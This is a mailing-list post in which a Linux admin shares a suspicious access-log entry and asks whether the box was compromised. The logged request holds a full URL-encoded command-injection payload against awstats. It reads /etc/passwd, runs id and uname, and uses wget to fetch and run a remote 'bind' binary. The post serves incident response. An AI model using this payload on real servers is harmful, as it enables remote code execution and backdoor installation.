I have awstats running on a server and saw this entry in my access.log. Can someone look at this and determine what the person was trying to do? I want to make sure they did nothing to the box. 65.67.68.194 - - [17/Feb/2005:10:31:29 -0700] "GET /cgi-bin/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bcat%20%2fetc%2fpasswd %3buname%20%2da%3bid%3becho%20Instalam%20Bind%20in%20%2fvar%2ftmp%3bcd%20%2fvar%2 ftmp%3bwget%20www%2epetry%2ese%2fpublic_html%2ftw%2etar%2egz%3btar%20%2dxvzf %20tw%2etar%2egz%3bcd%20tw%3b%2e%2fbind%3becho%20Instalam%20bind%20in%20%2ftmp %3bcd%20%2ftmp%3bwget%20www%2epetry%2ese%2fpublic_html%2ftw%2etar%2egz%3btar %20%2dxvzf%20tw%2etar%2egz%3bcd%20rw%3b%2e%2fbind%3becho%20%2d%2d%2d%2d%2d%2d%2d %2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%3becho%20by%20Zorg%20of%20 texter%21%3becho%20e_exp%3b%2500 HTTP/1.1" 200 526347 "-" "-" ------------------------------------------------- FastQ Communications Providing Innovative Internet Solutions Since 1993 --------------------------------------------------- PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us To subscribe, unsubscribe, or to change you mail settings: http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss